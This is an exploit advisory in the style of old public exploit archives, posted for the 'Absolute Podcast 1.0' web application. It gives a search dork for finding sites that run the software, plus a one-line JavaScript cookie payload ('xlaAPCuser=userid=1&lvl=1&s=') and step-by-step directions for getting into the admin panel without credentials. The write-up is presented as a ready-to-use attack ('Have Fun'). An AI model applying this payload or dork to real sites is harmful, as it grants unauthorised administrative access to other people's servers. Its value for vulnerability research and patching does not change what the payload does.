Absolute Podcast 1.0 Remote Insecure Cookie Handling Vulnerability

2008-10-30 05:01:04

###############################################################################################
_____ ____ __ ___ ______ ______ | ____ _____ _____
| / ___| \ \ / / / ____| / | | | | _ \ |
|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____
| | |_ || | | | |____ | | | | | | _ | |
|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______|

# Discovered By : Hakxer
# Home : Www.educ-up.com
# Type Gap : Insecure cookie handling
# script : Absloute Podcast V 1.0 [see script] http://www.xigla.com/apodcasting/demo.htm
# Greetz : Allah , Egyptian x Hacker , all my team , All educ-up member
# Team : EgY Coders
#################################################################################################

# Dork : "Powered by Absolute Podcast "

# Poc
==> javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s=";

# Live Script

# First go to Admin panel : http://www.xigla.com/apodcasting/demo/login.aspx
# [~] javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s=";
# Second Go to http://www.xigla.com/apodcasting/demo/menu.aspx
# See Admin panel ..

# Have Fun :D

###############################################################################

-------------------------------- The End of Gap -----------------------------------

## Contact : [email protected]
### Muslim Hacker .. I love you Mohammed Rasull Allah
######################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.